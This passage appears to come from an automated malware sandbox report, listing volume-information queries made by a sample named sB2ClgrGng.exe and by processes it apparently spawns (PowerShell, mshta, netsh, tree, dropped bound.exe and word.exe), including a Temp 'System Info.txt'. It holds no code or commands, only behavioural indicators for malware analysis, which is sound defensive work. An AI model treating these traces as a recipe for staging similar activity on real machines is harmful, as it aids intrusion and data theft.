Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\CURQNKVOIX.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\CURQNKVOIX.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\CURQNKVOIX.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\CURQNKVOIX.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\CURQNKVOIX.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\CURQNKVOIX.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\CURQNKVOIX.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ \System\System Info.txt VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	Queries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
